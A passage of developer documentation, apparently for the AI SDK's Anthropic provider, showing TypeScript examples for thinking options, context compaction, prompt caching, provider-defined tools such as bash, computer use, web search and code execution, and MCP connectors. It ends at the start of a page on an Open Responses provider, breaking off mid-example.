toolStreaming provider option to false.
import { anthropic } from '@ai-sdk/anthropic';
import { streamText, tool } from 'ai';
import { z } from 'zod';
const result = streamText({
model: anthropic('claude-sonnet-4-20250514'),
tools: {
writeFile: tool({
description: 'Write content to a file',
inputSchema: z.object({
path: z.string(),
content: z.string(),
}),
execute: async ({ path, content }) => {
// Implementation
return { success: true };
},
}),
},
prompt: 'Write a short story to story.txt',
});
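To opt out, set the provider option on the call (a minimal sketch; the tool set from the example above is omitted for brevity):
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';

const result = streamText({
  model: anthropic('claude-sonnet-4-20250514'),
  prompt: 'Write a short story to story.txt',
  providerOptions: {
    anthropic: {
      toolStreaming: false, // disable tool input streaming
    } satisfies AnthropicLanguageModelOptions,
  },
});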
Effort
Anthropic introduced an effort option with claude-opus-4-5 that affects thinking, text responses, and function calls. Effort defaults to high and you can set it to medium or low to save tokens and to lower time-to-last-token latency (TTLT). claude-opus-4-7 additionally supports xhigh for maximum reasoning effort.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, usage } = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
effort: 'low',
} satisfies AnthropicLanguageModelOptions,
},
});
console.log(text); // resulting text
console.log(usage); // token usage
Fast Mode
Anthropic supports a speed option for claude-opus-4-6 that enables faster inference with approximately 2.5x faster output token speeds.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Write a short poem about the sea.',
providerOptions: {
anthropic: {
speed: 'fast',
} satisfies AnthropicLanguageModelOptions,
},
});
The speed option accepts 'fast' or 'standard' (default behavior).
Task Budgets
claude-opus-4-7 supports a taskBudget option that informs the model of the total token budget available for an agentic turn. The model uses this information to prioritize work, plan ahead, and wind down gracefully as the budget is consumed.
Task budgets are advisory — they do not enforce a hard token limit. The model will attempt to stay within budget, but actual usage may vary.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-7'),
prompt: 'Research the pros and cons of Rust vs Go for building CLI tools.',
providerOptions: {
anthropic: {
taskBudget: {
type: 'tokens',
total: 400000,
},
} satisfies AnthropicLanguageModelOptions,
},
});
For long-running agents that compact and restart context, you can carry the remaining budget forward using the remaining field:
taskBudget: {
type: 'tokens',
total: 400000,
remaining: 215000, // budget left after prior compacted-away contexts
}
The taskBudget object accepts:
type"tokens" - Budget type. Currently only"tokens"is supported.totalnumber - Total task budget for the agentic turn. Minimum 20,000.remainingnumber - Budget left after prior compacted-away contexts. Must be between 0 andtotal. Defaults tototalif omitted.
Data Residency
Anthropic supports an inferenceGeo option that controls where model inference runs for a request.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Summarize the key points of this document.',
providerOptions: {
anthropic: {
inferenceGeo: 'us',
} satisfies AnthropicLanguageModelOptions,
},
});
The inferenceGeo option accepts 'us' (US-only infrastructure) or 'global' (default, any available geography).
Reasoning
Anthropic models support extended thinking, where Claude shows its reasoning process before providing a final answer.
Adaptive Thinking
For newer models (claude-sonnet-4-6, claude-opus-4-6, and later), use adaptive thinking.
Claude automatically determines how much reasoning to use based on the complexity of the prompt.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'adaptive' },
} satisfies AnthropicLanguageModelOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
You can combine adaptive thinking with the effort option to control how much reasoning Claude uses:
const { text } = await generateText({
model: anthropic('claude-opus-4-6'),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
anthropic: {
thinking: { type: 'adaptive' },
effort: 'max', // 'low' | 'medium' | 'high' | 'max'
} satisfies AnthropicLanguageModelOptions,
},
});
Thinking Display (Opus 4.7+)
Starting with claude-opus-4-7, thinking content is omitted from the response by default — thinking blocks are present in the stream but their text is empty. To receive reasoning output, set display: 'summarized':
const { text, reasoningText } = await generateText({
model: anthropic('claude-opus-4-7'),
providerOptions: {
anthropic: {
thinking: { type: 'adaptive', display: 'summarized' },
} satisfies AnthropicLanguageModelOptions,
},
prompt: 'How many people will live in the world in 2040?',
});
console.log(reasoningText); // reasoning text (empty without display: 'summarized')
console.log(text);
Budget-Based Thinking
For earlier models (claude-opus-4-20250514, claude-sonnet-4-20250514, claude-sonnet-4-5-20250929),
use type: 'enabled' with an explicit token budget:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-sonnet-4-5-20250929'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicLanguageModelOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
See AI SDK UI: Chatbot for more details on how to integrate reasoning into your chatbot.
Context Management
Anthropic's Context Management feature allows you to automatically manage conversation context by clearing tool uses or thinking content when certain conditions are met. This helps optimize token usage and manage long conversations more efficiently.
You can configure context management using the contextManagement provider option:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-5-20250929'),
prompt: 'Continue our conversation...',
providerOptions: {
anthropic: {
contextManagement: {
edits: [
{
type: 'clear_tool_uses_20250919',
trigger: { type: 'input_tokens', value: 10000 },
keep: { type: 'tool_uses', value: 5 },
clearAtLeast: { type: 'input_tokens', value: 1000 },
clearToolInputs: true,
excludeTools: ['important_tool'],
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
// Check what was cleared
console.log(result.providerMetadata?.anthropic?.contextManagement);
Context Editing
Context editing strategies selectively remove specific content types from earlier in the conversation to reduce token usage without losing the overall conversation flow.
Clear Tool Uses
The clear_tool_uses_20250919 edit type removes old tool call/result pairs from the conversation history:
- trigger - Condition that triggers the clearing (e.g., { type: 'input_tokens', value: 10000 } or { type: 'tool_uses', value: 10 })
- keep - How many recent tool uses to preserve (e.g., { type: 'tool_uses', value: 5 })
- clearAtLeast - Minimum amount to clear (e.g., { type: 'input_tokens', value: 1000 })
- clearToolInputs - Whether to clear tool input parameters (boolean)
- excludeTools - Array of tool names to never clear
Clear Thinking
The clear_thinking_20251015 edit type removes thinking/reasoning blocks from earlier turns, keeping only the most recent ones:
- keep - How many recent thinking turns to preserve (e.g., { type: 'thinking_turns', value: 2 }) or 'all' to keep everything
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Continue reasoning...',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
contextManagement: {
edits: [
{
type: 'clear_thinking_20251015',
keep: { type: 'thinking_turns', value: 2 },
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
Compaction
The compact_20260112 edit type automatically summarizes earlier conversation context when token limits are reached. This is useful for long-running conversations where you want to preserve the essence of earlier exchanges while staying within token limits.
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { streamText } from 'ai';
const result = streamText({
model: anthropic('claude-opus-4-6'),
messages: conversationHistory,
providerOptions: {
anthropic: {
contextManagement: {
edits: [
{
type: 'compact_20260112',
trigger: {
type: 'input_tokens',
value: 50000, // trigger compaction when input exceeds 50k tokens
},
instructions:
'Summarize the conversation concisely, preserving key decisions and context.',
pauseAfterCompaction: false,
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
Configuration:
- trigger - Condition that triggers compaction (e.g., { type: 'input_tokens', value: 50000 })
- instructions - Custom instructions for how the model should summarize the conversation. Use this to guide the compaction summary towards specific aspects of the conversation you want to preserve.
- pauseAfterCompaction - When true, the model will pause after generating the compaction summary, allowing you to inspect or process it before continuing. Defaults to false.
When compaction occurs, the model generates a summary of the earlier context. This summary appears as a text block with special provider metadata.
Detecting Compaction in Streams
When using streamText, you can detect compaction summaries by checking the providerMetadata on text-start events:
for await (const part of result.fullStream) {
switch (part.type) {
case 'text-start': {
const isCompaction =
part.providerMetadata?.anthropic?.type === 'compaction';
if (isCompaction) {
console.log('[COMPACTION SUMMARY START]');
}
break;
}
case 'text-delta': {
process.stdout.write(part.text);
break;
}
}
}
Compaction in UI Applications
When using useChat or other UI hooks, compaction summaries appear as regular text parts with providerMetadata. You can style them differently in your UI:
{
message.parts.map((part, index) => {
if (part.type === 'text') {
const isCompaction =
(part.providerMetadata?.anthropic as { type?: string } | undefined)
?.type === 'compaction';
if (isCompaction) {
return (
<div
key={index}
className="bg-yellow-100 border-l-4 border-yellow-500 p-2"
>
<span className="font-bold">[Compaction Summary]</span>
<div>{part.text}</div>
</div>
);
}
return <div key={index}>{part.text}</div>;
}
return null;
})
}
Applied Edits Metadata
After generation, you can check which edits were applied in the provider metadata:
const metadata = result.providerMetadata?.anthropic?.contextManagement;
if (metadata?.appliedEdits) {
metadata.appliedEdits.forEach(edit => {
if (edit.type === 'clear_tool_uses_20250919') {
console.log(`Cleared ${edit.clearedToolUses} tool uses`);
console.log(`Freed ${edit.clearedInputTokens} tokens`);
} else if (edit.type === 'clear_thinking_20251015') {
console.log(`Cleared ${edit.clearedThinkingTurns} thinking turns`);
console.log(`Freed ${edit.clearedInputTokens} tokens`);
} else if (edit.type === 'compact_20260112') {
console.log('Compaction was applied');
}
});
}
For more details, see Anthropic's Context Management documentation.
Cache Control
In the messages and message parts, you can use the providerOptions property to set cache control breakpoints.
You need to set the anthropic property in the providerOptions object to { cacheControl: { type: 'ephemeral' } } to set a cache control breakpoint.
The cache creation input tokens are then returned in the providerMetadata object
for generateText, again under the anthropic property.
When you use streamText, the response contains a promise
that resolves to the metadata. Alternatively you can receive it in the
onFinish callback.
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const errorMessage = '... long error message ...';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'You are a JavaScript expert.' },
{
type: 'text',
text: `Error message: ${errorMessage}`,
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{ type: 'text', text: 'Explain the error message.' },
],
},
],
});
console.log(result.text);
console.log(result.providerMetadata?.anthropic);
// e.g. { cacheCreationInputTokens: 2118 }
You can also use cache control on system messages by providing multiple system messages at the head of your messages array:
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
messages: [
{
role: 'system',
content: 'Cached system message part',
providerOptions: {
anthropic: { cacheControl: { type: 'ephemeral' } },
},
},
{
role: 'system',
content: 'Uncached system message part',
},
{
role: 'user',
content: 'User prompt',
},
],
});
Cache control for tools:
const result = await generateText({
model: anthropic('claude-haiku-4-5'),
tools: {
cityAttractions: tool({
inputSchema: z.object({ city: z.string() }),
providerOptions: {
anthropic: {
cacheControl: { type: 'ephemeral' },
},
},
}),
},
messages: [
{
role: 'user',
content: 'User prompt',
},
],
});
Longer cache TTL
Anthropic also supports a longer 1-hour cache duration.
Here's an example:
const result = await generateText({
model: anthropic('claude-haiku-4-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Long cached message',
providerOptions: {
anthropic: {
cacheControl: { type: 'ephemeral', ttl: '1h' },
},
},
},
],
},
],
});
Limitations
The minimum cacheable prompt length is:
- 4096 tokens for Claude Opus 4.5
- 1024 tokens for Claude Opus 4.1, Claude Opus 4, Claude Sonnet 4.5, Claude Sonnet 4, Claude Sonnet 3.7, and Claude Opus 3
- 4096 tokens for Claude Haiku 4.5
- 2048 tokens for Claude Haiku 3.5 and Claude Haiku 3
Shorter prompts cannot be cached, even if marked with cacheControl. Any requests to cache fewer than this number of tokens will be processed without caching.
For more on prompt caching with Anthropic, see Anthropic's Cache Control documentation.
Bash Tool
The Bash Tool allows running bash commands. Here's how to create and use it:
const bashTool = anthropic.tools.bash_20250124({
execute: async ({ command, restart }) => {
// Implement your bash command execution logic here
// Return the result of the command execution
},
});
Parameters:
- command (string): The bash command to run. Required unless the tool is being restarted.
- restart (boolean, optional): Specifying true will restart this tool.
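A usage sketch wiring the tool into generateText (runCommandSafely is a hypothetical helper standing in for your own sandboxed execution logic):
import { anthropic } from '@ai-sdk/anthropic';
import { generateText, stepCountIs } from 'ai';

const bashTool = anthropic.tools.bash_20250124({
  execute: async ({ command }) => {
    // runCommandSafely is a placeholder for your own execution logic
    return await runCommandSafely(command);
  },
});

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  prompt: 'List the files in the current directory.',
  tools: { bash: bashTool },
  stopWhen: stepCountIs(5),
});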
Memory Tool
The Memory Tool allows Claude to use a local memory, e.g. in the filesystem. Here's how to create it:
const memory = anthropic.tools.memory_20250818({
execute: async action => {
// Implement your memory command execution logic here
// Return the result of the command execution
},
});
Only certain Claude versions are supported.
Text Editor Tool
The Text Editor Tool provides functionality for viewing and editing text files.
const tools = {
str_replace_based_edit_tool: anthropic.tools.textEditor_20250728({
maxCharacters: 10000, // optional
async execute({ command, path, old_str, new_str, insert_text }) {
// ...
},
}),
} satisfies ToolSet;
- textEditor_20250728 - For Claude Sonnet 4, Opus 4, and Opus 4.1 (recommended)
- textEditor_20250124 - For Claude Sonnet 3.7
- textEditor_20241022 - For Claude Sonnet 3.5
Note: textEditor_20250429 is deprecated. Use textEditor_20250728 instead.
Parameters:
- command ('view' | 'create' | 'str_replace' | 'insert' | 'undo_edit'): The command to run. Note: undo_edit is only available in Claude 3.5 Sonnet and earlier models.
- path (string): Absolute path to file or directory, e.g. /repo/file.py or /repo.
- file_text (string, optional): Required for the create command, with the content of the file to be created.
- insert_line (number, optional): Required for the insert command. The line number after which to insert the new string.
- new_str (string, optional): New string for the str_replace command.
- insert_text (string, optional): Required for the insert command, containing the text to insert.
- old_str (string, optional): Required for the str_replace command, containing the string to replace.
- view_range (number[], optional): Optional for the view command to specify the line range to show.
Computer Tool
The Computer Tool enables control of keyboard and mouse actions on a computer:
const computerTool = anthropic.tools.computer_20251124({
displayWidthPx: 1920,
displayHeightPx: 1080,
displayNumber: 0, // Optional, for X11 environments
enableZoom: true, // Optional, enables the zoom action
execute: async ({ action, coordinate, text, region }) => {
// Implement your computer control logic here
// Return the result of the action
// Example code:
switch (action) {
case 'screenshot': {
// multipart result:
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
case 'zoom': {
// region is [x1, y1, x2, y2] defining the area to zoom into
return {
type: 'image',
data: fs.readFileSync('./data/zoomed-region.png').toString('base64'),
};
}
default: {
console.log('Action:', action);
console.log('Coordinate:', coordinate);
console.log('Text:', text);
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput({ output }) {
return typeof output === 'string'
? [{ type: 'text', text: output }]
: [{ type: 'image', data: output.data, mediaType: 'image/png' }];
},
});
Parameters:
- action ('key' | 'type' | 'mouse_move' | 'left_click' | 'left_click_drag' | 'right_click' | 'middle_click' | 'double_click' | 'screenshot' | 'cursor_position' | 'zoom'): The action to perform. The zoom action is only available with computer_20251124.
- coordinate (number[], optional): Required for mouse_move and left_click_drag actions. Specifies the (x, y) coordinates.
- text (string, optional): Required for type and key actions.
- region (number[], optional): Required for the zoom action. Specifies [x1, y1, x2, y2] coordinates for the area to inspect.
- displayWidthPx (number): The width of the display in pixels.
- displayHeightPx (number): The height of the display in pixels.
- displayNumber (number, optional): The display number for X11 environments.
- enableZoom (boolean, optional): Enable the zoom action. Only available with computer_20251124. Default: false.
Web Search Tool
Anthropic provides a provider-defined web search tool that gives Claude direct access to real-time web content, allowing it to answer questions with up-to-date information beyond its knowledge cutoff.
You can enable web search using the provider-defined web search tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const webSearchTool = anthropic.tools.webSearch_20250305({
maxUses: 5,
});
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'What are the latest developments in AI?',
tools: {
web_search: webSearchTool,
},
});
Configuration Options
The web search tool supports several configuration options:
- maxUses number: Maximum number of web searches Claude can perform during the conversation.
- allowedDomains string[]: Optional list of domains that Claude is allowed to search. If provided, searches will be restricted to these domains.
- blockedDomains string[]: Optional list of domains that Claude should avoid when searching.
- userLocation object: Optional user location information to provide geographically relevant search results.
const webSearchTool = anthropic.tools.webSearch_20250305({
maxUses: 3,
allowedDomains: ['techcrunch.com', 'wired.com'],
blockedDomains: ['example-spam-site.com'],
userLocation: {
type: 'approximate',
country: 'US',
region: 'California',
city: 'San Francisco',
timezone: 'America/Los_Angeles',
},
});
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Find local news about technology',
tools: {
web_search: webSearchTool,
},
});
Web Fetch Tool
Anthropic provides a provider-defined web fetch tool that allows Claude to retrieve content from specific URLs. This is useful when you want Claude to analyze or reference content from a particular webpage or document.
You can enable web fetch using the provider-defined web fetch tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-0'),
prompt:
'What is this page about? https://en.wikipedia.org/wiki/Maglemosian_culture',
tools: {
web_fetch: anthropic.tools.webFetch_20250910({ maxUses: 1 }),
},
});
Tool Search
Anthropic provides provider-defined tool search tools that enable Claude to work with hundreds or thousands of tools by dynamically discovering and loading them on-demand. Instead of loading all tool definitions into the context window upfront, Claude searches your tool catalog and loads only the tools it needs.
There are two variants:
- BM25 Search - Uses natural language queries to find tools
- Regex Search - Uses regex patterns (Python re.search() syntax) to find tools
Basic Usage
import { anthropic } from '@ai-sdk/anthropic';
import { generateText, tool } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
prompt: 'What is the weather in San Francisco?',
tools: {
toolSearch: anthropic.tools.toolSearchBm25_20251119(),
get_weather: tool({
description: 'Get the current weather at a specific location',
inputSchema: z.object({
location: z.string().describe('The city and state'),
}),
execute: async ({ location }) => ({
location,
temperature: 72,
condition: 'Sunny',
}),
// Defer tool here - Claude discovers these via the tool search tool
providerOptions: {
anthropic: { deferLoading: true },
},
}),
},
});
Using Regex Search
For more precise tool matching, you can use the regex variant:
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
prompt: 'Get the weather data',
tools: {
toolSearch: anthropic.tools.toolSearchRegex_20251119(),
// ... deferred tools
},
});
Claude will construct regex patterns like weather|temperature|forecast to find matching tools.
Custom Tool Search
You can implement your own tool search logic (e.g., using embeddings or semantic search) by returning tool-reference content blocks via toModelOutput:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText, tool } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
prompt: 'What is the weather in San Francisco?',
tools: {
// Custom search tool
searchTools: tool({
description: 'Search for tools by keyword',
inputSchema: z.object({ query: z.string() }),
execute: async ({ query }) => {
// Your custom search logic (embeddings, fuzzy match, etc.)
const allTools = ['get_weather', 'get_forecast', 'get_temperature'];
return allTools.filter(name => name.includes(query.toLowerCase()));
},
toModelOutput: ({ output }) => ({
type: 'content',
value: (output as string[]).map(toolName => ({
type: 'custom' as const,
providerOptions: {
anthropic: {
type: 'tool-reference',
toolName,
},
},
})),
}),
}),
// Deferred tools
get_weather: tool({
description: 'Get the current weather',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }) => ({ location, temperature: 72 }),
providerOptions: {
anthropic: { deferLoading: true },
},
}),
},
});
This sends tool_reference blocks to Anthropic, which loads the corresponding deferred tool schemas into Claude's context.
MCP Connectors
Anthropic supports connecting to MCP servers as part of their execution.
You can enable this feature with the mcpServers provider option:
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
prompt: `Call the echo tool with "hello world". what does it respond with back?`,
providerOptions: {
anthropic: {
mcpServers: [
{
type: 'url',
name: 'echo',
url: 'https://echo.mcp.inevitable.fyi/mcp',
// optional: authorization token
authorizationToken: mcpAuthToken,
// optional: tool configuration
toolConfiguration: {
enabled: true,
allowedTools: ['echo'],
},
},
],
} satisfies AnthropicLanguageModelOptions,
},
});
The tool calls and results are dynamic, i.e. the input and output schemas are not known.
Configuration Options
The web fetch tool supports several configuration options (a combined example follows the list):
- maxUses number: Limits the number of web fetches performed.
- allowedDomains string[]: Only fetch from these domains.
- blockedDomains string[]: Never fetch from these domains.
- citations object: Unlike web search where citations are always enabled, citations are optional for web fetch. Set "citations": {"enabled": true} to enable Claude to cite specific passages from fetched documents.
- maxContentTokens number: Limits the amount of content that will be included in the context.
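A configuration sketch combining these options (domain and token values are placeholders):
const webFetchTool = anthropic.tools.webFetch_20250910({
  maxUses: 2,
  allowedDomains: ['en.wikipedia.org'], // placeholder domain list
  citations: { enabled: true },
  maxContentTokens: 20000, // placeholder limit
});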
Error Handling
Web search errors are handled differently depending on whether you're using streaming or non-streaming:
Non-streaming (generateText):
Web search errors throw exceptions that you can catch:
try {
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Search for something',
tools: {
web_search: webSearchTool,
},
});
} catch (error) {
if (error.message.includes('Web search failed')) {
console.log('Search error:', error.message);
// Handle search error appropriately
}
}
Streaming (streamText):
Web search errors are delivered as error parts in the stream:
const result = streamText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Search for something',
tools: {
web_search: webSearchTool,
},
});
for await (const part of result.fullStream) {
if (part.type === 'error') {
console.log('Search error:', part.error);
// Handle search error appropriately
}
}
Code Execution
Anthropic provides a provider-defined code execution tool that gives Claude direct access to a real Python environment, allowing it to execute code to inform its responses.
You can enable code execution using the provider-defined code execution tool:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const codeExecutionTool = anthropic.tools.codeExecution_20260120();
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt:
'Calculate the mean and standard deviation of [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]',
tools: {
code_execution: codeExecutionTool,
},
});
Error Handling
Code execution errors are handled differently depending on whether you're using streaming or non-streaming:
Non-streaming (generateText):
Code execution errors are delivered as tool result parts in the response:
const result = await generateText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Execute some Python script',
tools: {
code_execution: codeExecutionTool,
},
});
const toolErrors = result.content?.filter(
content => content.type === 'tool-error',
);
toolErrors?.forEach(error => {
console.error('Tool execution error:', {
toolName: error.toolName,
toolCallId: error.toolCallId,
error: error.error,
});
});
Streaming (streamText):
Code execution errors are delivered as error parts in the stream:
const result = streamText({
model: anthropic('claude-opus-4-20250514'),
prompt: 'Execute some Python script',
tools: {
code_execution: codeExecutionTool,
},
});
for await (const part of result.fullStream) {
if (part.type === 'error') {
console.log('Code execution error:', part.error);
// Handle code execution error appropriately
}
}
Programmatic Tool Calling
Programmatic Tool Calling allows Claude to write code that calls your tools programmatically within a code execution container, rather than requiring round trips through the model for each tool invocation. This reduces latency for multi-tool workflows and decreases token consumption.
To enable programmatic tool calling, use the allowedCallers provider option on tools that you want to be callable from within code execution:
import {
anthropic,
forwardAnthropicContainerIdFromLastStep,
} from '@ai-sdk/anthropic';
import { generateText, tool, stepCountIs } from 'ai';
import { z } from 'zod';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
stopWhen: stepCountIs(10),
prompt:
'Get the weather for Tokyo, Sydney, and London, then calculate the average temperature.',
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
getWeather: tool({
description: 'Get current weather data for a city.',
inputSchema: z.object({
city: z.string().describe('Name of the city'),
}),
execute: async ({ city }) => {
// Your weather API implementation
return { temp: 22, condition: 'Sunny' };
},
// Enable this tool to be called from within code execution
providerOptions: {
anthropic: {
allowedCallers: ['code_execution_20260120'],
},
},
}),
},
// Propagate container ID between steps for code execution continuity
prepareStep: forwardAnthropicContainerIdFromLastStep,
});
In this flow:
- Claude writes Python code that calls your getWeather tool multiple times in parallel
- The SDK automatically executes your tool and returns results to the code execution container
- Claude processes the results in code and generates the final response
Container Persistence
When using programmatic tool calling across multiple steps, you need to preserve the container ID between steps using prepareStep. You can use the forwardAnthropicContainerIdFromLastStep helper function to do this automatically. The container ID is available in providerMetadata.anthropic.container.id after each step completes.
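If you want to read the container ID yourself, here is a sketch (assuming the metadata shape described above) using the onStepFinish callback:
import {
  anthropic,
  forwardAnthropicContainerIdFromLastStep,
} from '@ai-sdk/anthropic';
import { generateText, stepCountIs } from 'ai';

const result = await generateText({
  model: anthropic('claude-sonnet-4-5'),
  stopWhen: stepCountIs(10),
  prompt: 'Get the weather for Tokyo, Sydney, and London.',
  tools: {
    code_execution: anthropic.tools.codeExecution_20260120(),
    // ...your allowedCallers tools from the example above
  },
  prepareStep: forwardAnthropicContainerIdFromLastStep,
  onStepFinish: step => {
    // container ID location as described above; cast because the metadata is untyped
    const containerId = (
      step.providerMetadata?.anthropic as
        | { container?: { id?: string } }
        | undefined
    )?.container?.id;
    console.log('container id:', containerId);
  },
});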
Agent Skills
Anthropic Agent Skills enable Claude to perform specialized tasks like document processing (PPTX, DOCX, PDF, XLSX) and data analysis. Skills run in a sandboxed container and require the code execution tool to be enabled.
Using Built-in Skills
Anthropic provides several built-in skills:
- pptx - Create and edit PowerPoint presentations
- docx - Create and edit Word documents
- pdf - Process and analyze PDF files
- xlsx - Work with Excel spreadsheets
To use skills, you need to:
- Enable the code execution tool
- Specify the container with skills in providerOptions
import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
},
prompt: 'Create a presentation about renewable energy with 5 slides',
providerOptions: {
anthropic: {
container: {
skills: [
{
type: 'anthropic',
skillId: 'pptx',
version: 'latest', // optional
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
Custom Skills
You can also use custom skills by specifying type: 'custom':
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
},
prompt: 'Use my custom skill to process this data',
providerOptions: {
anthropic: {
container: {
skills: [
{
type: 'custom',
skillId: 'my-custom-skill-id',
version: '1.0', // optional
},
],
},
} satisfies AnthropicLanguageModelOptions,
},
});
PDF support
Anthropic Claude models support reading PDF files.
You can pass PDF files as part of the message content using the file type:
Option 1: URL-based PDF document
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: new URL(
'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/ai.pdf?raw=true',
),
mediaType: 'application/pdf',
},
],
},
],
});
Option 2: Base64-encoded PDF document
import fs from 'node:fs';
const result = await generateText({
model: anthropic('claude-sonnet-4-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model according to this document?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Computer Use | Web Search | Tool Search | Compaction |
|---|---|---|---|---|---|---|---|
| claude-opus-4-7 | | | | | | | |
| claude-opus-4-6 | | | | | | | |
| claude-sonnet-4-6 | | | | | | | |
| claude-opus-4-5 | | | | | | | |
| claude-haiku-4-5 | | | | | | | |
| claude-sonnet-4-5 | | | | | | | |
| claude-opus-4-1 | | | | | | | |
| claude-opus-4-0 | | | | | | | |
| claude-sonnet-4-0 | | | | | | | |
title: Open Responses
description: Learn how to use the Open Responses provider for the AI SDK.
Open Responses Provider
The Open Responses provider contains language model support for Open Responses compatible APIs.
Setup
The Open Responses provider is available in the @ai-sdk/open-responses module. You can install it with
pnpm add @ai-sdk/open-responses
Provider Instance
Create an Open Responses provider instance using createOpenResponses:
import { createOpenResponses } from '@ai-sdk/open-responses';
const openResponses = createOpenResponses({
name: 'aProvider',
url: 'http://localhost:1234/v1/responses',
});
The name and url options are required:
- name string: Provider name. Used as the key for provider options and metadata.
- url string: URL for the Open Responses API POST endpoint.
You can use the following optional settings to customize the Open Responses provider instance:
- apiKey string: API key that is being sent using the Authorization header.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function.
Language Models
The Open Responses provider instance is a function that you can invoke to create a language model:
const model = openResponses('mistralai/ministral-3-14b-reasoning');
You can use Open Responses models with the generateText and streamText functions,
and they support structured data generation with Output
(see AI SDK Core).
Example
import { createOpenResponses } from '@ai-sdk/open-responses';
import { generateText } from 'ai';
const openResponses = createOpenResponses({
name: 'aProvider',
url: 'http://localhost:1234/v1/responses',
});
const { text } = await generateText({
model: openResponses('mistralai/ministral-3-14b-reasoning'),
prompt: 'Invent a new holiday and describe its traditions.',
});
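As a minimal sketch of structured data generation with Output (the schema and prompt here are illustrative, not part of the Open Responses API):

```ts
import { createOpenResponses } from '@ai-sdk/open-responses';
import { generateText, Output } from 'ai';
import { z } from 'zod';

const openResponses = createOpenResponses({
  name: 'aProvider',
  url: 'http://localhost:1234/v1/responses',
});

// Request a typed object instead of free-form text.
const result = await generateText({
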